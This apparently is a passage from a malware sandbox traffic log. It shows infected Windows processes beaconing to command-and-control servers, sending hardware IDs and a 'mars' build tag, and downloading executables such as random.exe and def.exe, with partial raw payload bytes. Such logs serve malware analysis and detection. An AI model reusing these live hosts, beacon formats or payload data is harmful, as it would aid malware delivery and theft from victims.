Nov 13, 2024 20:41:27.732430935 CET	413	OUT	POST /c4becf79229cb002.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----JKKFIIEBKEGIEBFIJKFI Host: 185.215.113.206 Content-Length: 211 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 4a 4b 4b 46 49 49 45 42 4b 45 47 49 45 42 46 49 4a 4b 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 38 33 45 42 46 43 35 33 37 32 36 33 30 35 30 34 35 37 33 35 38 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 4b 46 49 49 45 42 4b 45 47 49 45 42 46 49 4a 4b 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6d 61 72 73 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 4b 46 49 49 45 42 4b 45 47 49 45 42 46 49 4a 4b 46 49 2d 2d 0d 0a Data Ascii: ------JKKFIIEBKEGIEBFIJKFIContent-Disposition: form-data; name="hwid"E83EBFC537263050457358------JKKFIIEBKEGIEBFIJKFIContent-Disposition: form-data; name="build"mars------JKKFIIEBKEGIEBFIJKFI--
Nov 13, 2024 20:41:28.015101910 CET	210	IN	HTTP/1.1 200 OK Date: Wed, 13 Nov 2024 19:41:27 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 8 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 59 6d 78 76 59 32 73 3d Data Ascii: YmxvY2s=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.5	50150	185.215.113.43	80	2848	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 13, 2024 20:41:26.973886967 CET	184	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 31 Cache-Control: no-cache Data Raw: 64 31 3d 31 30 30 36 30 34 30 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1006040001&unit=246122658369
Nov 13, 2024 20:41:27.883203030 CET	193	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 13 Nov 2024 19:41:27 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 4 <c>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.5	50152	185.215.113.16	80	2848	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 13, 2024 20:41:28.065238953 CET	140	OUT	GET /steam/random.exe HTTP/1.1 Host: 185.215.113.16 If-Modified-Since: Wed, 13 Nov 2024 19:21:30 GMT If-None-Match: "6734fc3a-1b7400"
Nov 13, 2024 20:41:28.995785952 CET	192	IN	HTTP/1.1 304 Not Modified Server: nginx/1.18.0 (Ubuntu) Date: Wed, 13 Nov 2024 19:41:28 GMT Last-Modified: Wed, 13 Nov 2024 19:21:30 GMT Connection: keep-alive ETag: "6734fc3a-1b7400"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.5	50156	185.215.113.43	80	2848	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 13, 2024 20:41:30.989289999 CET	184	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 31 Cache-Control: no-cache Data Raw: 64 31 3d 31 30 30 36 30 34 31 30 33 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1006041031&unit=246122658369
Nov 13, 2024 20:41:31.937951088 CET	193	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 13 Nov 2024 19:41:31 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 4 <c>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.5	50157	185.215.113.16	80	2848	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 13, 2024 20:41:31.946899891 CET	54	OUT	GET /off/random.exe HTTP/1.1 Host: 185.215.113.16
Nov 13, 2024 20:41:32.878207922 CET	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 13 Nov 2024 19:41:32 GMT Content-Type: application/octet-stream Content-Length: 2811904 Last-Modified: Wed, 13 Nov 2024 19:20:09 GMT Connection: keep-alive ETag: "6734fbe9-2ae800" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 50 28 2c 65 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 24 00 00 00 08 00 00 00 00 00 00 00 60 2b 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 a0 2b 00 00 04 00 00 6a 77 2b 00 02 00 60 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 80 00 00 69 00 00 00 00 60 00 00 9c 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: MZ@z!L!This program cannot be run in DOS mode.$PELP(,e"0$`+ `@ +jw+`Ui` @ @.rsrc`2@.idata 8@ckqtwfzn*:@wmhyjqub @+@.taggant@`+"*@
Nov 13, 2024 20:41:32.878232002 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 13, 2024 20:41:32.878245115 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 13, 2024 20:41:32.878257036 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 13, 2024 20:41:32.878268003 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 13, 2024 20:41:32.878278971 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 13, 2024 20:41:32.878290892 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 13, 2024 20:41:32.878509998 CET	1236	IN	Data Raw: 1c f8 0f fb f4 55 11 c0 7d 44 0f 38 6e 7a 6c ea 19 91 76 da da 2f 63 9a a9 0a 45 b9 43 8f d5 cf d5 7c bb 5e 3f 6d 96 1a 26 c5 4c f0 4e 33 01 bb 8a 0b 31 ea c6 fe 03 b6 7c 2d 0e b4 8c 03 c8 cc 8e f6 20 fa f4 01 1d 12 d9 1a 30 b0 6a 14 0e 4b b7 dd Data Ascii: U}D8nzlv/cEC\|^?m&LN31\|- 0jK5F~[Eu )_M"jW3(s;=8/%Pn`tD&6HnKw+SzwP~}9n!j7w
Nov 13, 2024 20:41:32.878524065 CET	1236	IN	Data Raw: 09 f9 26 10 31 f9 2a dc 19 e4 af f0 73 1c 25 69 bb 24 21 f4 ec 2f 43 d9 aa 81 4b 00 91 3c 1b fb ba 24 5b da 1c 5c 5f fd 21 ef 9c 78 91 f9 66 fa ba 58 27 28 ed 40 77 ee de 95 81 34 b9 1c 83 d1 ea 1d bb 54 74 78 14 82 91 7c 33 fb fa 0d 9b 48 03 b4 Data Ascii: &1*s%i$!/CK<$[\_!xfX'(@w4Ttx\|3H:6:5xO`/rOSk\ O$S\X!;tn/xFq):.$jK'5+UyGxU\|<~Iot$$//;bwg./
Nov 13, 2024 20:41:32.878535986 CET	1236	IN	Data Raw: d2 16 20 01 e7 34 27 cd cd 61 d7 fa 85 e0 16 6f 80 ef 28 28 c1 09 4b a1 75 52 56 19 e0 d4 7c 9e d7 21 55 2b 7f 75 49 bf 0b 53 fc cd 9a 0e 5c 91 cb fc 7a 0a 71 5f 98 1c 8b ec 84 1c dc 4f 77 55 03 09 73 e9 8c 53 6b 03 82 c6 bb fb f8 a9 40 4c 3e e2 Data Ascii: 4'ao((KuRV\|!U+uIS\zq_OwUsSk@L>Zi79#N.N;_{LS/"o%&{#UqFt-N[ 2:#HJ!L<1<S)!2qGr}_U%& Y(#eHI
Nov 13, 2024 20:41:32.883542061 CET	1120	IN	Data Raw: 79 41 f0 a4 a3 10 06 d4 9e 94 0c bf 57 f0 48 db 6e 09 15 3b 6f 10 67 c8 6b 26 f3 20 72 01 f2 eb 6e 00 6d 06 bc 0d b9 8d ee d5 02 32 d0 bf 24 69 ba ba 7f ff d1 5e 2f b8 ba ee 18 0f d9 4d 73 06 69 5b 71 fd de 4f 68 a9 3b 19 12 8b 2b 63 76 3d db d4 Data Ascii: yAWHn;ogk& rnm2$i^/Msi[qOh;+cv=lilv}J<z<6d'i7o8.DV;$#<%16t"#s5/t=/%w@@;\uC$ #.=>:aNho5q's/S

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.5	50168	185.215.113.43	80	2848	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 13, 2024 20:41:41.592432976 CET	184	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 31 Cache-Control: no-cache Data Raw: 64 31 3d 31 30 30 36 30 34 32 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1006042001&unit=246122658369
Nov 13, 2024 20:41:42.423202038 CET	193	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 13 Nov 2024 19:41:42 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 4 <c>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.5	50170	185.215.113.16	80	7864	C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe

Timestamp	Bytes transferred	Direction	Data
Nov 13, 2024 20:41:42.769689083 CET	200	OUT	GET /off/def.exe HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Host: 185.215.113.16
Nov 13, 2024 20:41:43.676160097 CET	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 13 Nov 2024 19:41:43 GMT Content-Type: application/octet-stream Content-Length: 2811904 Last-Modified: Wed, 13 Nov 2024 19:20:11 GMT Connection: keep-alive ETag: "6734fbeb-2ae800" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 50 28 2c 65 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 24 00 00 00 08 00 00 00 00 00 00 00 60 2b 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 a0 2b 00 00 04 00 00 6a 77 2b 00 02 00 60 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 80 00 00 69 00 00 00 00 60 00 00 9c 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: MZ@z!L!This program cannot be run in DOS mode.$PELP(,e"0$`+ `@ +jw+`Ui` @ @.rsrc`2@.idata 8@ckqtwfzn*:@wmhyjqub @+@.taggant@`+"*@
Nov 13, 2024 20:41:43.676176071 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 13, 2024 20:41:43.676186085 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 13, 2024 20:41:43.676317930 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 13, 2024 20:41:43.676327944 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 13, 2024 20:41:43.676336050 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 13, 2024 20:41:43.676358938 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 13, 2024 20:41:43.676570892 CET	1236	IN	Data Raw: 1c f8 0f fb f4 55 11 c0 7d 44 0f 38 6e 7a 6c ea 19 91 76 da da 2f 63 9a a9 0a 45 b9 43 8f d5 cf d5 7c bb 5e 3f 6d 96 1a 26 c5 4c f0 4e 33 01 bb 8a 0b 31 ea c6 fe 03 b6 7c 2d 0e b4 8c 03 c8 cc 8e f6 20 fa f4 01 1d 12 d9 1a 30 b0 6a 14 0e 4b b7 dd Data Ascii: U}D8nzlv/cEC\|^?m&LN31\|- 0jK5F~[Eu )_M"jW3(s;=8/%Pn`tD&6HnKw+SzwP~}9n!j7w
Nov 13, 2024 20:41:43.676580906 CET	1236	IN	Data Raw: 09 f9 26 10 31 f9 2a dc 19 e4 af f0 73 1c 25 69 bb 24 21 f4 ec 2f 43 d9 aa 81 4b 00 91 3c 1b fb ba 24 5b da 1c 5c 5f fd 21 ef 9c 78 91 f9 66 fa ba 58 27 28 ed 40 77 ee de 95 81 34 b9 1c 83 d1 ea 1d bb 54 74 78 14 82 91 7c 33 fb fa 0d 9b 48 03 b4 Data Ascii: &1*s%i$!/CK<$[\_!xfX'(@w4Ttx\|3H:6:5xO`/rOSk\ O$S\X!;tn/xFq):.$jK'5+UyGxU\|<~Iot$$//;bwg./
Nov 13, 2024 20:41:43.676589012 CET	1236	IN	Data Raw: d2 16 20 01 e7 34 27 cd cd 61 d7 fa 85 e0 16 6f 80 ef 28 28 c1 09 4b a1 75 52 56 19 e0 d4 7c 9e d7 21 55 2b 7f 75 49 bf 0b 53 fc cd 9a 0e 5c 91 cb fc 7a 0a 71 5f 98 1c 8b ec 84 1c dc 4f 77 55 03 09 73 e9 8c 53 6b 03 82 c6 bb fb f8 a9 40 4c 3e e2 Data Ascii: 4'ao((KuRV\|!U+uIS\zq_OwUsSk@L>Zi79#N.N;_{LS/"o%&{#UqFt-N[ 2:#HJ!L<1<S)!2qGr}_U%& Y(#eHI
Nov 13, 2024 20:41:43.691634893 CET	1120	IN	Data Raw: 79 41 f0 a4 a3 10 06 d4 9e 94 0c bf 57 f0 48 db 6e 09 15 3b 6f 10 67 c8 6b 26 f3 20 72 01 f2 eb 6e 00 6d 06 bc 0d b9 8d ee d5 02 32 d0 bf 24 69 ba ba 7f ff d1 5e 2f b8 ba ee 18 0f d9 4d 73 06 69 5b 71 fd de 4f 68 a9 3b 19 12 8b 2b 63 76 3d db d4 Data Ascii: yAWHn;ogk& rnm2$i^/Msi[qOh;+cv=lilv}J<z<6d'i7o8.DV;$#<%16t"#s5/t=/%w@@;\uC$ #.=>:aNho5q's/S

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.5	50171	185.215.113.206	80	5940	C:\Users\user\AppData\Local\Temp\1006040001\deb333ea90.exe

Timestamp	Bytes transferred	Direction	Data
Nov 13, 2024 20:41:43.646564007 CET	90	OUT	GET / HTTP/1.1 Host: 185.215.113.206 Connection: Keep-Alive Cache-Control: no-cache
Nov 13, 2024 20:41:44.891056061 CET	203	IN	HTTP/1.1 200 OK Date: Wed, 13 Nov 2024 19:41:44 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Nov 13, 2024 20:41:44.891115904 CET	203	IN	HTTP/1.1 200 OK Date: Wed, 13 Nov 2024 19:41:44 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Nov 13, 2024 20:41:44.893585920 CET	413	OUT	POST /c4becf79229cb002.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----JDBFIIEBGCAKKEBFBAAF Host: 185.215.113.206 Content-Length: 211 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 4a 44 42 46 49 49 45 42 47 43 41 4b 4b 45 42 46 42 41 41 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 38 33 45 42 46 43 35 33 37 32 36 33 30 35 30 34 35 37 33 35 38 0d 0a 2d 2d 2d 2d 2d 2d 4a 44 42 46 49 49 45 42 47 43 41 4b 4b 45 42 46 42 41 41 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6d 61 72 73 0d 0a 2d 2d 2d 2d 2d 2d 4a 44 42 46 49 49 45 42 47 43 41 4b 4b 45 42 46 42 41 41 46 2d 2d 0d 0a Data Ascii: ------JDBFIIEBGCAKKEBFBAAFContent-Disposition: form-data; name="hwid"E83EBFC537263050457358------JDBFIIEBGCAKKEBFBAAFContent-Disposition: form-data; name="build"mars------JDBFIIEBGCAKKEBFBAAF--
Nov 13, 2024 20:41:45.183897018 CET	210	IN	HTTP/1.1 200 OK Date: Wed, 13 Nov 2024 19:41:45 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 8 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 59 6d 78 76 59 32 73 3d Data Ascii: YmxvY2s=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.5	50173	185.215.113.43	80	2848	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 13, 2024 20:41:44.892853022 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Nov 13, 2024 20:41:45.958759069 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 13 Nov 2024 19:41:45 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.5	50175	185.215.113.43	80	2848	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 13, 2024 20:41:47.470781088 CET	310	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 43 42 32 32 39 37 30 42 34 35 38 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7CB22970B45882D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Nov 13, 2024 20:41:48.408782959 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 13 Nov 2024 19:41:48 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.5	50181	185.215.113.43	80	2848	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 13, 2024 20:41:50.035912037 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Nov 13, 2024 20:41:50.928287983 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 13 Nov 2024 19:41:50 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.5	50182	185.215.113.16	80	5408	C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe

Timestamp	Bytes transferred	Direction	Data
Nov 13, 2024 20:41:50.564899921 CET	200	OUT	GET /off/def.exe HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Host: 185.215.113.16
Nov 13, 2024 20:41:52.872025013 CET	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 13 Nov 2024 19:41:51 GMT Content-Type: application/octet-stream Content-Length: 2811904 Last-Modified: Wed, 13 Nov 2024 19:20:11 GMT Connection: keep-alive ETag: "6734fbeb-2ae800" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 50 28 2c 65 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 24 00 00 00 08 00 00 00 00 00 00 00 60 2b 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 a0 2b 00 00 04 00 00 6a 77 2b 00 02 00 60 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 80 00 00 69 00 00 00 00 60 00 00 9c 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: MZ@z!L!This program cannot be run in DOS mode.$PELP(,e"0$`+ `@ +jw+`Ui` @ @.rsrc`2@.idata 8@ckqtwfzn*:@wmhyjqub @+@.taggant@`+"*@
